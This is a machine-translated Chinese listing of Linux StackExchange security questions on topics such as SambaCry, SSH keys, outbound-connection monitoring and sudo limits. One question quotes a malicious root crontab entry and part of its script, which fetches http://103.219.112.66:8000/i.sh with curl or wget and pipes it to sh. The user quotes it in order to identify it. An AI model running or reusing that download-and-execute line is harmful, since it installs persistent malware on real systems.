Questions tagged «security»

与计算机安全性有关的内容,即与策略,机制等有关的内容,可确保数据在任何情况下均不会泄漏或损坏,并且服务可用。

2
Linux系统上的“ WannaCry”:您如何保护自己?
根据Rapid7的文章,有一些易受攻击的Samba版本允许在Linux系统上远程执行代码: 尽管WannaCry勒索病毒影响了Windows系统,并且很容易识别,并且采取了明确的补救措施,但Samba漏洞将影响Linux和Unix系统,并且可能对获得或部署适当的补救措施造成重大技术障碍。 CVE-2017-7494 从3.5.0版开始的所有版本的Samba都容易受到远程代码执行漏洞的攻击,从而使恶意客户端可以将共享库上传到可写共享,然后导致服务器加载并执行它。 可能的攻击场景: 从两个因素开始: Samba漏洞在某些Linux发行版中尚未修复。 在某些Linux内核版本(例如,在4.8.0-41通用的Ubuntu内核上的CVE-2017-7308)上,存在一个未修补的本地特权升级漏洞。 攻击者可以使用本地漏洞利用漏洞访问Linux机器并提升特权,以获取root用户访问权限并安装可能的将来的勒索软件,类似于此模拟 的Linux WannaCry勒索软件。 更新资料 最新文章“警告!黑客开始使用“ SambaCry Flaw”来入侵Linux系统”展示了如何使用Sambacry缺陷来感染Linux机器。 卡巴斯基实验室的研究人员建立的蜜罐捕获了一个恶意软件活动,该活动利用SambaCry漏洞利用加密货币挖掘软件感染Linux计算机,因此该预测非常准确。 另一名安全研究员Omri Ben Bassat独立发现了同一活动,并将其命名为“ EternalMiner”。 根据研究人员的说法,在公开披露Samba漏洞并安装升级版本的“ CPUminer”(一种用于挖掘“ Monero”数字货币的加密货币挖掘软件)之后一周,一个未知的黑客组织就开始劫持Linux PC。 使用SambaCry漏洞破坏了易受攻击的计算机之后,攻击者会在目标系统上执行两个有效负载: INAebsGB.so —一个反向外壳,提供对攻击者的远程访问。 cblRWuoCc.so —包含加密货币挖掘实用程序的后门程序– CPUminer。 TrendLab报告发布于2017年7月18日:由于新威胁利用SambaCry,Linux用户被迫进行更新 如何保护Linux系统以防止受到攻击?

3
服务器管理员向我发送了一个私钥供使用。为什么?
我应该访问服务器,以便将公司的暂存服务器和实时服务器链接到我们的部署循环中。他们那边的管理员设置了两个实例,然后在服务器上创建了一个用户供我们以SSH身份登录。我已经习惯了这么多。 我现在想到的是,我将把我的公钥发送给他们,该公钥可以放在他们的授权密钥文件夹中。但是,他们却给我发送了一个文件名id_rsa,该文件名中包含-----BEGIN RSA PRIVATE KEY-----通过电子邮件发送的文件名。这正常吗? 我环顾四周,从头开始可以找到大量资源来生成和设置自己的密钥,但是从服务器的私钥开始却无济于事。我应该使用它来为自己生成一些密钥吗? 我会直接问系统管理员,但不想成为一个白痴,浪费大家在我们之间的时间。我是否应该忽略他发送给我的密钥,并要求他们将我的公共密钥放入他们的授权文件夹中?

7
如何监视我的计算机上的所有传出请求/连接?
我的机器是服务器,因此我想忽略与服务器的连接(例如,当有人访问我的网站时)。我希望看到只有连接/请求被我的服务器到其他地方做。 我如何仅查看那些传出的连接? 编辑:我是这些类型的东西的新手。我要尝试做的只是查看是否从服务器发送了除Web应用程序数据以外的任何内容。例如,如果有人访问了我的网站,则显然我的服务器会将数据发送到客户端的浏览器。但是,假设我的Web应用程序框架中还有代码将统计数据发送到我不知道的其他地方。我希望看到服务器将数据发送到的那些位置(如果有)。可能不太可能,但是假设您决定使用未编写的php或nodejs框架:很有可能它会在某处发送某种类型的数据。如果是这样,那就是我想要看到的。

3
curl如何防止密码出现在ps输出中?
我前段时间注意到,curl作为命令行参数提供的用户名和密码不会出现在ps输出中(尽管它们可能会出现在您的bash历史记录中)。 他们同样不会出现在中/proc/PID/cmdline。 (不过,可以导出用户名/密码组合参数的长度。) 演示如下: [root@localhost ~]# nc -l 80 & [1] 3342 [root@localhost ~]# curl -u iamsam:samiam localhost & [2] 3343 [root@localhost ~]# GET / HTTP/1.1 Authorization: Basic aWFtc2FtOnNhbWlhbQ== User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.15.3 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 Host: localhost Accept: */* [1]+ Stopped nc -l 80 [root@localhost ~]# jobs [1]+ …

18
不能更改root密码的root用户访问权限?
我们在服务器上有一个小问题。我们希望某些用户应该能够执行操作sudo并成为root用户,但是要限制用户不能更改root密码。也就是说,无论其他用户将做什么,我们仍然可以登录到该服务器并成为root用户。 那可能吗?
66 ubuntu  security  sudo 

4
有什么方法可以防止将命令添加到您的历史记录中?
有什么方法可以防止将命令添加到您的历史记录中?我有一个命令要保留在历史记录文件中,并且当我搜索存储在内存中的历史记录时,我真的不在乎将其保存在该文件中,尽管这没什么大问题。有什么方法可以防止这种情况,还是我只需要返回并编辑历史文件。 更新:我没有意识到这可能是特定于外壳的。我的壳是zsh。欢迎您回答其他外壳程序,以便人们知道如何在其外壳程序中执行此操作。

2
发放我的SSH公钥上班是否安全?
我目前在许多组织中进行远程工作,这些组织需要我定期访问其服务器以进行维护和升级。对我来说,将RSA公用SSH密钥添加到.ssh/authorized_keys文件中是否安全,从而使我可以更快地登录/无需查找密码?我假设不可能从公共密钥生成私钥,但我的假设对吗? 更进一步,将我的RSA公钥内容发布到Internet上是否会存在任何安全风险?我知道,如果获得了我的私钥,我会遇到很多麻烦,但是除此之外,还存在真正的安全威胁吗?

4
将/ var,/ home移动到单独的分区
阅读本指南后,我尝试将一些文件夹(例如/var和/home)移动到单独的分区: 3.2.1选择智能分区方案 按照本指南,我能够成功移动一个文件夹。 但是,它似乎不适用于多个文件夹,并且我所有的文件夹都没有适当的文件夹转储到分区中。 我想安装/var,/home和/tmp到单独的分区; 有人可以指导我吗?

2
可疑的crontab条目每15分钟运行一次“ xribfa4”
我想在Raspberry Pi上的根crontab文件中添加一些内容,但发现一个对我来说似乎可疑的条目,在Google上搜索它的部分内容没有任何结果。 Crontab条目: */15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -m180 -fsSL http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh 的内容http://103.219.112.66:8000/i.sh是: export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin mkdir -p /var/spool/cron/crontabs echo "" > /var/spool/cron/root echo "*/15 * * * * (/usr/bin/xribfa4||/usr/libexec/xribfa4||/usr/local/bin/xribfa4||/tmp/xribfa4||curl -fsSL -m180 http://103.219.112.66:8000/i.sh||wget -q -T180 -O- http://103.219.112.66:8000/i.sh) | sh" >> /var/spool/cron/root cp -f /var/spool/cron/root /var/spool/cron/crontabs/root …
59 security  cron  malware 

2
Chromium选项`--no-sandbox`是什么意思?
我像这样运行Chromium: chromium --no-sandbox 之所以这样做,是因为我在OpenVZ VM容器上运行Debian Squeeze,这是使它工作的唯一方法。 尽管我一直在读书,这太可怕了。但是我想知道为什么。有人可以向我解释吗? 有人需要侵入您的计算机进行破坏吗?还是该漏洞来自JavaScript之类的网络文件? 如果我只锁定了少数几个“受信任”的网站,该怎么办?(Gmail,stackexchange(课程)和facebook)

1
为什么前1024个端口仅限于root用户?
这比其他任何事情都更让人感到好奇。我的一个朋友问我“在Linux下只有root可以使用哪个端口范围?” 我告诉他0-1024被限制。然后他问我为什么会这样……我茫然不知所措。完全不知道 为什么限制这些端口而不限制1025-65535是有原因的? 大多数主要的网络服务(HTTP,FTP,SSH,Telnet,HTTPS,POP,SMTP等)都在此范围内,因此我想到了可能的答案: 不受信任的用户可以运行一个程序,这些程序在这些端口上侦听登录详细信息。 不受信任的用户可以运行未经授权的服务器应用程序。 有人可以在这里亮吗?

5
Mutt:如何安全存储密码?
我的.muttrc文件看起来像这样,也可以在下面看到。我对密码不满意。我应该如何存储密码才能使用mutt? set imap_user = "username@gmail.com" set imap_pass = "password" set smtp_url = "smtp://username@smtp.gmail.com:587/" set smtp_pass = "password" set from = "username@gmail.com" set realname = "Your Real Name"
52 security  mutt 

3
将Amazon .pem密钥转换为Putty .ppk密钥Linux
我已经.pem从AWS 生成并下载了私钥。但是,要使用Putty连接到虚拟机,我必须具有该.ppk格式的密钥。转换过程大约在20行中进行了详细说明: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/get-set-up-for-amazon-ec2.html#prepare-for-putty 我正在使用Linux Mint(Ubuntu发行版),并且我知道可以在终端中使用puttygen。但是,我不知道如何使用该工具,也不知道如何配置所需的参数。当我输入puttygen --help时 PuTTYgen unidentified build, Aug 7 2013 12:24:58 Usage: puttygen ( keyfile | -t type [ -b bits ] ) [ -C comment ] [ -P ] [ -q ] [ -o output-keyfile ] [ -O type | -l | -L | -p ] -t …


2
如何识别没有pid的进程?
我有一个侦听2个端口的进程:45136 / tcp和37208 / udp(实际上,我认为它是同一进程)。但是netstat不会返回任何pid: netstat -antlp | grep 45136 tcp 0 0 0.0.0.0:45136 0.0.0.0:* LISTEN - 与“ grep 37208”相同的结果。 我也尝试过lsof: lsof -i TCP:45136 但是它什么也不会返回。这是新安装的挤压程序,我真的不知道该过程可能是什么。任何想法 ? 回答 感谢您的评论,我发现了它的含义。我卸载了nfs-server nfs-common(在dkpg --get-selections | grep nfs搜索之后),未知进程消失了。尽管没有以任何方式标记内核进程,这很奇怪。 再次感谢你们俩。;)

By using our site, you acknowledge that you have read and understand our Cookie Policy and Privacy Policy.
Licensed under cc by-sa 3.0 with attribution required.